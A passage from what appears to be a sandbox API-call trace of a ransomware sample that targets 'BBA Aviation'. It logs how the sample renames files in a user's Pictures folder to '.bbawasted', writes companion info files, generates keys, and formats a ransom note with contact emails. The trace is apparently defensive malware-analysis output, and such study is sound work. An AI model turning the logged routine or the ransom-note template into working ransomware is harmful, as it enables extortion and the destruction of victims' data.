"c:\\users\\fd1hvy\\pictures\\ocqjxq.jpg.bbawasted"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x27c [0226.972] CreateFileMappingW (hFile=0x27c, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x294 [0226.972] GetFileSize (in: hFile=0x27c, lpFileSizeHigh=0x147fe8c | out: lpFileSizeHigh=0x147fe8c*=0x0) returned 0x7643 [0226.972] MapViewOfFile (hFileMappingObject=0x294, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x7643) returned 0x5f0000 [0226.972] CloseHandle (hObject=0x27c) returned 1 [0226.974] UnmapViewOfFile (lpBaseAddress=0x5f0000) returned 1 [0226.974] CloseHandle (hObject=0x294) returned 1 [0226.974] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x200) returned 0x66dd58 [0226.974] CryptAcquireContextW (in: phProv=0x147fe7c, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x147fe7c*=0x6a6708) returned 1 [0226.975] CryptGenRandom (in: hProv=0x6a6708, dwLen=0x1b8, pbBuffer=0x66dda0 | out: pbBuffer=0x66dda0) returned 1 [0226.975] CryptReleaseContext (hProv=0x6a6708, dwFlags=0x0) returned 1 [0226.975] CryptAcquireContextW (in: phProv=0x147fbe4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x147fbe4*=0x6a6928) returned 1 [0226.976] CryptGenRandom (in: hProv=0x6a6928, dwLen=0x200, pbBuffer=0x147fc00 | out: pbBuffer=0x147fc00) returned 1 [0226.976] CryptReleaseContext (hProv=0x6a6928, dwFlags=0x0) returned 1 [0227.246] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x403) returned 0x6aecf0 [0227.246] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x66dd58 | out: hHeap=0x660000) returned 1 [0227.246] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xa3a) returned 0x6bff48 [0227.247] _snwprintf (in: _Dest=0x6bff48, _Count=0x51d, _Format="BBA Aviation\r\n\r\nYOUR NETWORK IS ENCRYPTED NOW\r\n\r\nUSE 91645@PROTONMAIL.CH | 61258@ECLIPSO.CH TO GET THE PRICE FOR YOUR DATA\r\n\r\nDO NOT GIVE THIS EMAIL TO 3RD PARTIES\r\n\r\nDO NOT RENAME OR MOVE THE FILE\r\n\r\nTHE FILE IS ENCRYPTED WITH THE FOLLOWING KEY:\r\n[begin_key]%S[end_key]\r\nKEEP IT\r\n" | out: _Dest="BBA Aviation\r\n\r\nYOUR NETWORK IS ENCRYPTED NOW\r\n\r\nUSE 91645@PROTONMAIL.CH | 61258@ECLIPSO.CH TO GET THE PRICE FOR YOUR DATA\r\n\r\nDO NOT GIVE THIS EMAIL TO 3RD PARTIES\r\n\r\nDO NOT RENAME OR MOVE THE FILE\r\n\r\nTHE FILE IS ENCRYPTED WITH THE FOLLOWING KEY:\r\n[begin_key]RhhjmnO2g2wZFUUnefhj9pC+a+IiTJ1LqAIIppc0KNP9Z0Lj8YnKmMbK2J3twHby\r\nhsPGA5lCJg7Ct/tZWg/SLRw2A8xTomYKnGvn7liD+sLXp2tgdzH9O9V3xrq7tXM1\r\nrom/cbx1OXWRpEe9CqlaQAGeQ9ah33PNv2HOdYP7hYH8Uy7TLwCfQh16o2ECvYst\r\n9EhO5zpFSITNR7+qHc2isIRfa5IHVrO7PWowl+3S2VMFT1bMHnI0MVNYTRmmJ2X1\r\n+DN9Pv/MzBpRooljs1xKbBj4tyXAXb+0Kv0yXFfv72OzEpFtkklKUVQucL/DGV0n\r\nLAr2nfTSpyEslOr23lVlvCxHZatc4QDKOYzQeIzxSzbOmLxFyWWdxQ5wISV6h55g\r\nulW59hcewbxzEpt0N2mQja/i/CnwQffrlz3gDSuSGWjkoJfoPqBaqcIG/86ACwaD\r\naA6OHo37gc7kU5bDP9Fbo9x3IvPcyOUvBCuEGyHXx57vqixHQ3NbwlUvllCaHCTz\r\nTMlE7rsCNPoRB9eMOLSMTcgCjN5LwkEmYVco6ZpmPpWDi2Shh+zh/u3kd40wlBhX\r\n3YcYqYX2Jllr5Yuus2xLlL/gvzkWAzD2zoskBRzFIL4uzKdBrocs+6p8f6GNDw/I\r\nAfiQ+FWUYkUBQoayJWiVqi+E3tv8jhW/xsHbV0+pJ6G=[end_key]\r\nKEEP IT\r\n") returned 984 [0227.247] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6aecf0 | out: hHeap=0x660000) returned 1 [0227.247] WriteFile (in: hFile=0x28c, lpBuffer=0x6bff48*, nNumberOfBytesToWrite=0x7b0, lpNumberOfBytesWritten=0x147fef0, lpOverlapped=0x0 | out: lpBuffer=0x6bff48*, lpNumberOfBytesWritten=0x147fef0*=0x7b0, lpOverlapped=0x0) returned 1 [0227.247] SetEndOfFile (hFile=0x28c) returned 1 [0227.627] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6bff48 | out: hHeap=0x660000) returned 1 [0227.627] CloseHandle (hObject=0x28c) returned 1 [0227.627] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6bc8e0 | out: hHeap=0x660000) returned 1 [0227.627] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6b44c0 | out: hHeap=0x660000) returned 1 [0227.627] _aulldvrm () returned 0x0 [0227.627] CryptAcquireContextW (in: phProv=0x147fec4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x147fec4*=0x6a5f98) returned 1 [0227.628] CryptGenRandom (in: hProv=0x6a5f98, dwLen=0x48, pbBuffer=0x147ff00 | out: pbBuffer=0x147ff00) returned 1 [0227.628] CryptReleaseContext (hProv=0x6a5f98, dwFlags=0x0) returned 1 [0227.628] lstrlenW (lpString="\\\\?\\C:\\Users\\FD1HVy\\Pictures\\vJ 7.gif") returned 37 [0227.628] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x254) returned 0x6bc8e0 [0227.629] lstrcpyW (in: lpString1=0x6bc92a, lpString2=".bbawasted_info" | out: lpString1=".bbawasted_info") returned=".bbawasted_info" [0227.629] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xa3a) returned 0x6bdcf0 [0227.629] CryptAcquireContextW (in: phProv=0x147fea0, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x147fea0*=0x6a69b0) returned 1 [0227.629] CryptGenRandom (in: hProv=0x6a69b0, dwLen=0xa3a, pbBuffer=0x6bdcf0 | out: pbBuffer=0x6bdcf0) returned 1 [0227.629] CryptReleaseContext (hProv=0x6a69b0, dwFlags=0x0) returned 1 [0227.629] CreateFileW (lpFileName="\\\\?\\C:\\Users\\FD1HVy\\Pictures\\vJ 7.gif.bbawasted_info" (normalized: "c:\\users\\fd1hvy\\pictures\\vj 7.gif.bbawasted_info"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x28c [0227.634] WriteFile (in: hFile=0x28c, lpBuffer=0x6bdcf0*, nNumberOfBytesToWrite=0xa3a, lpNumberOfBytesWritten=0x147febc, lpOverlapped=0x0 | out: lpBuffer=0x6bdcf0*, lpNumberOfBytesWritten=0x147febc*=0xa3a, lpOverlapped=0x0) returned 1 [0227.635] SetEndOfFile (hFile=0x28c) returned 1 [0227.635] SetFilePointer (in: hFile=0x28c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0227.635] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6bdcf0 | out: hHeap=0x660000) returned 1 [0227.635] lstrcpyW (in: lpString1=0x6bc92a, lpString2=".bbawasted" | out: lpString1=".bbawasted") returned=".bbawasted" [0227.635] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\FD1HVy\\Pictures\\vJ 7.gif" (normalized: "c:\\users\\fd1hvy\\pictures\\vj 7.gif"), lpNewFileName="\\\\?\\C:\\Users\\FD1HVy\\Pictures\\vJ 7.gif.bbawasted" (normalized: "c:\\users\\fd1hvy\\pictures\\vj 7.gif.bbawasted")) returned 1 [0227.636] CreateFileW (lpFileName="\\\\?\\C:\\Users\\FD1HVy\\Pictures\\vJ 7.gif.bbawasted" (normalized: "c:\\users\\fd1hvy\\pictures\\vj 7.gif.bbawasted"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x27c [0227.637] CreateFileMappingW (hFile=0x27c, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x294 [0227.637] GetFileSize (in: hFile=0x27c, lpFileSizeHigh=0x147fe8c | out: lpFileSizeHigh=0x147fe8c*=0x0) returned 0xfd78 [0227.637] MapViewOfFile (hFileMappingObject=0x294, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0xfd78) returned 0x5f0000 [0227.637] CloseHandle (hObject=0x27c) returned 1 [0227.639] UnmapViewOfFile (lpBaseAddress=0x5f0000) returned 1 [0227.645] CloseHandle (hObject=0x294) returned 1 [0227.645] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x200) returned 0x66dd58 [0227.645] CryptAcquireContextW (in: phProv=0x147fe7c, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x147fe7c*=0x6a6b48) returned 1 [0227.645] CryptGenRandom (in: hProv=0x6a6b48, dwLen=0x1b8, pbBuffer=0x66dda0 | out: pbBuffer=0x66dda0) returned 1 [0227.645] CryptReleaseContext (hProv=0x6a6b48, dwFlags=0x0) returned 1 [0227.646] CryptAcquireContextW (in: phProv=0x147fbe4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x147fbe4*=0x6a61b8) returned 1 [0227.646] CryptGenRandom (in: hProv=0x6a61b8, dwLen=0x200, pbBuffer=0x147fc00 | out: pbBuffer=0x147fc00) returned 1 [0227.646] CryptReleaseContext (hProv=0x6a61b8, dwFlags=0x0) returned 1 [0227.658] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x403) returned 0x6c4b88 [0227.658] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x66dd58 | out: hHeap=0x660000) returned 1 [0227.658] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xa3a) returned 0x6bdcf0 [0227.658] _snwprintf (in: _Dest=0x6bdcf0, _Count=0x51d, _Format="BBA Aviation\r\n\r\nYOUR NETWORK IS ENCRYPTED NOW\r\n\r\nUSE 91645@PROTONMAIL.CH | 61258@ECLIPSO.CH TO GET THE PRICE FOR YOUR DATA\r\n\r\nDO NOT GIVE THIS EMAIL TO 3RD PARTIES\r\n\r\nDO NOT RENAME OR MOVE THE FILE\r\n\r\nTHE FILE IS ENCRYPTED WITH THE FOLLOWING KEY:\r\n[begin_key]%S[end_key]\r\nKEEP IT\r\n" | out: _Dest="BBA Aviation\r\n\r\nYOUR NETWORK IS ENCRYPTED NOW\r\n\r\nUSE 91645@PROTONMAIL.CH | 61258@ECLIPSO.CH TO GET THE PRICE FOR YOUR DATA\r\n\r\nDO NOT GIVE THIS EMAIL TO 3RD PARTIES\r\n\r\nDO NOT RENAME OR MOVE THE FILE\r\n\r\nTHE FILE IS ENCRYPTED WITH THE FOLLOWING KEY:\r\n[begin_key]IvpsR2EUPnDtA+fkjl/YMYeHKOhzdBhGTLKzntRNqSZcwrd2uBz07gcNjhcyTgSI\r\nqREsHHGk/pT9trKlwUtUQBXxhS77/ozYFafvYrCI2vMV0eqQqaH0SGGwHXGZZE2h\r\nrxwgpq/8mDjJC7fzu1Z4xU8SVQc1euTcznz/OBcqMcgrQghh9eYrzmfV6pUhrdzB\r\nxXPTrbqeQfx8h80geaHXRvG1kwlQfKSrOmbfTa/2/vSA/snMpJa5NBE/aXBanCur\r\nW1eOPyQ2+bC0AFezYmA5Y3/q5LMQgLMkuRPE3X1EPhaE8ByzpbY0MLFMsV9cCfgg\r\nIr9DQxJ7B0nVz7mcWJjDh/x8TNOuTbQ4VDlXKqoSqncMnd7W/gydrIiIzgtf1dRb\r\nwgKotvL5SqT4cuELUuCi0sfj3tJ5bzz3jGUnlWgQfAHmkuOueSLQ5hm78vpej4ab\r\n1CYULivBYbHtSw2Ye6XtUuE67HG/LdbUUrAf7qFz3+rVJDeSPq/CxHkP4l/DpoiP\r\nvzrxnJJcAiTtsAJu/fMw41OKYe1ErZQE60jX9gbxFcZBqx7QdIXSEckBJTLVbK8I\r\nJGM7evnqPsTu5sYNSp6ufovkFP4TEi2QLdm5W527KWHSl1tm+LVymY6ig1hEbISf\r\nRDaieBDiuL2euynlBvaXJ0d2pK81+u5Nh2Vq5gult02=[end_key]\r\nKEEP IT\r\n") returned 984 [0227.658] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6c4b88 | out: hHeap=0x660000) returned 1 [0227.658] WriteFile (in: hFile=0x28c, lpBuffer=0x6bdcf0*, nNumberOfBytesToWrite=0x7b0, lpNumberOfBytesWritten=0x147fef0, lpOverlapped=0x0 | out: lpBuffer=0x6bdcf0*, lpNumberOfBytesWritten=0x147fef0*=0x7b0, lpOverlapped=0x0) returned 1 [0227.659] SetEndOfFile (hFile=0x28c) returned 1 [0227.661] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6bdcf0 | out: hHeap=0x660000) returned 1 [0227.661] CloseHandle (hObject=0x28c) returned 1 [0227.661] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6bc8e0 | out: hHeap=0x660000) returned 1 [0227.662] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6b3500 | out: hHeap=0x660000) returned 1 [0227.662] _aulldvrm () returned 0x0 [0227.662] CryptAcquireContextW (in: phProv=0x147fec4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x147fec4*=0x6a6130) returned 1 [0227.663] CryptGenRandom (in: hProv=0x6a6130, dwLen=0x48, pbBuffer=0x147ff00 | out: pbBuffer=0x147ff00) returned 1 [0227.663] CryptReleaseContext (hProv=0x6a6130, dwFlags=0x0) returned 1 [0227.663] lstrlenW (lpString="\\\\?\\C:\\Users\\FD1HVy\\Pictures\\Vjw5XWGfisYEQcYVCTss.png") returned 53 [0227.663] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x274) returned 0x6bc8e0 [0227.663] lstrcpyW (in: lpString1=0x6bc94a, lpString2=".bbawasted_info" | out: lpString1=".bbawasted_info") returned=".bbawasted_info" [0227.663] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xa3a) returned 0x6bdcf0 [0227.663] CryptAcquireContextW (in: phProv=0x147fea0, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x147fea0*=0x6a60a8) returned 1 [0227.664] CryptGenRandom (in: hProv=0x6a60a8, dwLen=0xa3a, pbBuffer=0x6bdcf0 | out: pbBuffer=0x6bdcf0) returned 1 [0227.664] CryptReleaseContext (hProv=0x6a60a8, dwFlags=0x0) returned 1 [0227.664] CreateFileW (lpFileName="\\\\?\\C:\\Users\\FD1HVy\\Pictures\\Vjw5XWGfisYEQcYVCTss.png.bbawasted_info" (normalized: "c:\\users\\fd1hvy\\pictures\\vjw5xwgfisyeqcyvctss.png.bbawasted_info"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x28c [0227.665] WriteFile (in: hFile=0x28c, lpBuffer=0x6bdcf0*, nNumberOfBytesToWrite=0xa3a, lpNumberOfBytesWritten=0x147febc, lpOverlapped=0x0 | out: lpBuffer=0x6bdcf0*, lpNumberOfBytesWritten=0x147febc*=0xa3a, lpOverlapped=0x0) returned 1 [0227.666] SetEndOfFile (hFile=0x28c) returned 1 [0227.666] SetFilePointer (in: hFile=0x28c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0227.666] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6bdcf0 | out: hHeap=0x660000) returned 1 [0227.666] lstrcpyW (in: lpString1=0x6bc94a, lpString2=".bbawasted" | out: lpString1=".bbawasted") returned=".bbawasted" [0227.666] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\FD1HVy\\Pictures\\Vjw5XWGfisYEQcYVCTss.png" (normalized: "c:\\users\\fd1hvy\\pictures\\vjw5xwgfisyeqcyvctss.png"), lpNewFileName="\\\\?\\C:\\Users\\FD1HVy\\Pictures\\Vjw5XWGfisYEQcYVCTss.png.bbawasted" (normalized: "c:\\users\\fd1hvy\\pictures\\vjw5xwgfisyeqcyvctss.png.bbawasted")) returned 1 [0227.667] CreateFileW (lpFileName="\\\\?\\C:\\Users\\FD1HVy\\Pictures\\Vjw5XWGfisYEQcYVCTss.png.bbawasted" (normalized: "c:\\users\\fd1hvy\\pictures\\vjw5xwgfisyeqcyvctss.png.bbawasted"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x294 [0227.668] CreateFileMappingW (hFile=0x294, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x27c [0227.668] GetFileSize (in: hFile=0x294, lpFileSizeHigh=0x147fe8c | out: lpFileSizeHigh=0x147fe8c*=0x0) returned 0xdb29 [0227.668] MapViewOfFile (hFileMappingObject=0x27c, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0xdb29) returned 0x5f0000 [0227.668] CloseHandle (hObject=0x294) returned 1 [0227.670] UnmapViewOfFile (lpBaseAddress=0x5f0000) returned 1 [0227.993] CloseHandle (hObject=0x27c) returned 1 [0227.993] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x200) returned 0x66dd58 [0227.993] CryptAcquireContextW (in: phProv=0x147fe7c, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x147fe7c*=0x6a6460) returned 1 [0227.993] CryptGenRandom (in: hProv=0x6a6460, dwLen=0x1b8, pbBuffer=0x66dda0 | out: pbBuffer=0x66dda0) returned 1 [0227.994] CryptReleaseContext (hProv=0x6a6460, dwFlags=0x0) returned 1 [0227.994] CryptAcquireContextW (in: phProv=0x147fbe4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x147fbe4*=0x6a62c8) returned 1 [0227.994] CryptGenRandom (in: hProv=0x6a62c8, dwLen=0x200, pbBuffer=0x147fc00 | out: pbBuffer=0x147fc00) returned 1 [0227.994] CryptReleaseContext (hProv=0x6a62c8, dwFlags=0x0) returned 1 [0228.005] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x403) returned 0x6c4b88 [0228.005] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x66dd58 | out: hHeap=0x660000) returned 1 [0228.005] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xa3a) returned 0x6bdcf0 [0228.006] _snwprintf (in: _Dest=0x6bdcf0, _Count=0x51d, _Format="BBA Aviation\r\n\r\nYOUR NETWORK IS ENCRYPTED NOW\r\n\r\nUSE 91645@PROTONMAIL.CH | 61258@ECLIPSO.CH TO GET THE PRICE FOR YOUR DATA\r\n\r\nDO NOT GIVE THIS EMAIL TO 3RD PARTIES\r\n\r\nDO NOT RENAME OR MOVE THE FILE\r\n\r\nTHE FILE IS ENCRYPTED WITH THE FOLLOWING KEY:\r\n[begin_key]%S[end_key]\r\nKEEP IT\r\n" | out: _Dest="BBA Aviation\r\n\r\nYOUR NETWORK IS ENCRYPTED NOW\r\n\r\nUSE 91645@PROTONMAIL.CH | 61258@ECLIPSO.CH TO GET THE PRICE FOR YOUR DATA\r\n\r\nDO NOT GIVE THIS EMAIL TO 3RD PARTIES\r\n\r\nDO NOT RENAME OR MOVE THE FILE\r\n\r\nTHE FILE IS ENCRYPTED WITH THE FOLLOWING KEY:\r\n[begin_key]rx9/Pz01B/Hri3Fn/+VtF4TU3rdjcYsAbSfjiGGlwYb/uNbFM5v26wcJkYD1zK83\r\n2bh6upWZtytm2Pv4I3kRd4P9V6PAVRg+fm+Bl+cHEemahimhgnYhZNKNiIayG/G6\r\nrb57IYQgWJuTgD+YDzlFH+KqYbUoJ3m0O6+aQ/Z9wa+sCzKMi9q3+QB5X+FZQCgZ\r\nphaay2x2pRsfiEZyae4Oe4LxLl1OItnFbYh5Vf1/cRpXbmUaDTiKbXJZtFGK1Zb2\r\npPcKshzosKUXYNla7TsiFP74Kq+yxdzq99qsCmEmHunlH/m3ScSLi0bLrJZ7aKkh\r\nGU6UkGgqfCDqW6C53gVlFgLhKYgvbivhoBLp3Qy8id1zoEwRGBrsh2L5cojY9Lew\r\nOnp/3nmy+3Io5GJCWwx+w/L2uXS0pAAR3luBAjte3WN+vE6/i3k7fb5HRn3eJkKH\r\nfbrcxStWSAV51fffxLfSaCJ8Mku6JL9DNTzS+W1Uj+90DpeldGoRo3w+Mryc+Gas\r\n9I7lMxk77UBDBWEoD6Zn1ftsX77OlY1oCoXv5Om5gnSdTebI0eurO38bzWEhEi/c\r\nVurJfv9Lg8kZ/GXwbOXvrrQ0gr5ZOzBjtDNRFji0y1k0Uf7fFnXUGPdHkNMCZuGs\r\nqB9pyeZMFs22tnc8+uEafcZXTAXfBqiqHnnKRrgNgbI=[end_key]\r\nKEEP IT\r\n") returned 984 [0228.006] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6c4b88 | out: hHeap=0x660000) returned 1 [0228.006] WriteFile (in: hFile=0x28c, lpBuffer=0x6bdcf0*, nNumberOfBytesToWrite=0x7b0, lpNumberOfBytesWritten=0x147fef0, lpOverlapped=0x0 | out: lpBuffer=0x6bdcf0*, lpNumberOfBytesWritten=0x147fef0*=0x7b0, lpOverlapped=0x0) returned 1 [0228.006] SetEndOfFile (hFile=0x28c) returned 1 [0228.009] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6bdcf0 | out: hHeap=0x660000) returned 1 [0228.009] CloseHandle (hObject=0x28c) returned 1 [0228.009] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6bc8e0 | out: hHeap=0x660000) returned 1 [0228.009] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6b79f0 | out: hHeap=0x660000) returned 1 [0228.009] _aulldvrm () returned 0x0 [0228.009] CryptAcquireContextW (in: phProv=0x147fec4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x147fec4*=0x6a6460) returned 1 [0228.010] CryptGenRandom (in: hProv=0x6a6460, dwLen=0x48, pbBuffer=0x147ff00 | out: pbBuffer=0x147ff00) returned 1 [0228.010] CryptReleaseContext (hProv=0x6a6460, dwFlags=0x0) returned 1 [0228.010] lstrlenW (lpString="\\\\?\\C:\\Users\\FD1HVy\\Pictures\\zWEzN.gif") returned 38 [0228.010] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x256) returned 0x6bc8e0 [0228.010] lstrcpyW (in: lpString1=0x6bc92c, lpString2=".bbawasted_info" | out: lpString1=".bbawasted_info") returned=".bbawasted_info" [0228.011] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xa3a) returned 0x6bdcf0 [0228.011] CryptAcquireContextW (in: phProv=0x147fea0, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x147fea0*=0x6a6b48) returned 1 [0228.011] CryptGenRandom (in: hProv=0x6a6b48, dwLen=0xa3a, pbBuffer=0x6bdcf0 | out: pbBuffer=0x6bdcf0) returned 1 [0228.011] CryptReleaseContext (hProv=0x6a6b48, dwFlags=0x0) returned 1 [0228.011] CreateFileW (lpFileName="\\\\?\\C:\\Users\\FD1HVy\\Pictures\\zWEzN.gif.bbawasted_info" (normalized: "c:\\users\\fd1hvy\\pictures\\zwezn.gif.bbawasted_info"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x28c [0228.022] WriteFile (in: hFile=0x28c, lpBuffer=0x6bdcf0*, nNumberOfBytesToWrite=0xa3a, lpNumberOfBytesWritten=0x147febc, lpOverlapped=0x0 | out: lpBuffer=0x6bdcf0*, lpNumberOfBytesWritten=0x147febc*=0xa3a, lpOverlapped=0x0) returned 1 [0228.023] SetEndOfFile (hFile=0x28c) returned 1 [0228.223] SetFilePointer (in: hFile=0x28c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0228.223] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6bdcf0 | out: hHeap=0x660000) returned 1 [0228.223] lstrcpyW (in: lpString1=0x6bc92c, lpString2=".bbawasted" | out: lpString1=".bbawasted") returned=".bbawasted" [0228.224] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\FD1HVy\\Pictures\\zWEzN.gif" (normalized: "c:\\users\\fd1hvy\\pictures\\zwezn.gif"), lpNewFileName="\\\\?\\C:\\Users\\FD1HVy\\Pictures\\zWEzN.gif.bbawasted" (normalized: "c:\\users\\fd1hvy\\pictures\\zwezn.gif.bbawasted")) returned 1 [0228.225] CreateFileW (lpFileName="\\\\?\\C:\\Users\\FD1HVy\\Pictures\\zWEzN.gif.bbawasted" (normalized: "c:\\users\\fd1hvy\\pictures\\zwezn.gif.bbawasted"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x27c [0228.225] CreateFileMappingW (hFile=0x27c, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x294 [0228.226] GetFileSize (in: hFile=0x27c, lpFileSizeHigh=0x147fe8c | out: lpFileSizeHigh=0x147fe8c*=0x0) returned 0x16ed [0228.226] MapViewOfFile (hFileMappingObject=0x294, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x16ed) returned 0x5f0000 [0228.226] CloseHandle (hObject=0x27c) returned 1 [0228.226] UnmapViewOfFile (lpBaseAddress=0x5f0000) returned 1 [0228.227] CloseHandle (hObject=0x294) returned 1 [0228.227] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x200) returned 0x66dd58 [0228.227] CryptAcquireContextW (in: phProv=0x147fe7c, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x147fe7c*=0x6a6460) returned 1 [0228.228] CryptGenRandom (in: hProv=0x6a6460, dwLen=0x1b8, pbBuffer=0x66dda0 | out: pbBuffer=0x66dda0) returned 1 [0228.228] CryptReleaseContext (hProv=0x6a6460, dwFlags=0x0) returned 1 [0228.228] CryptAcquireContextW (in: phProv=0x147fbe4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x147fbe4*=0x6a5f98) returned 1 [0228.228] CryptGenRandom (in: hProv=0x6a5f98, dwLen=0x200, pbBuffer=0x147fc00 | out: pbBuffer=0x147fc00) returned 1 [0228.229] CryptReleaseContext (hProv=0x6a5f98, dwFlags=0x0) returned 1 [0228.239] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x403) returned 0x6c4b88 [0228.240] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x66dd58 | out: hHeap=0x660000) returned 1 [0228.240] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xa3a) returned 0x6bdcf0 [0228.240] _snwprintf (in: _Dest=0x6bdcf0, _Count=0x51d, _Format="BBA Aviation\r\n\r\nYOUR NETWORK IS ENCRYPTED NOW\r\n\r\nUSE 91645@PROTONMAIL.CH | 61258@ECLIPSO.CH TO GET THE PRICE FOR YOUR DATA\r\n\r\nDO NOT GIVE THIS EMAIL TO 3RD PARTIES\r\n\r\nDO NOT RENAME OR MOVE THE FILE\r\n\r\nTHE FILE IS ENCRYPTED WITH THE FOLLOWING KEY:\r\n[begin_key]%S[end_key]\r\nKEEP IT\r\n" | out: _Dest="BBA Aviation\r\n\r\nYOUR NETWORK IS ENCRYPTED NOW\r\n\r\nUSE 91645@PROTONMAIL.CH | 61258@ECLIPSO.CH TO GET THE PRICE FOR YOUR DATA\r\n\r\nDO NOT GIVE THIS EMAIL TO 3RD 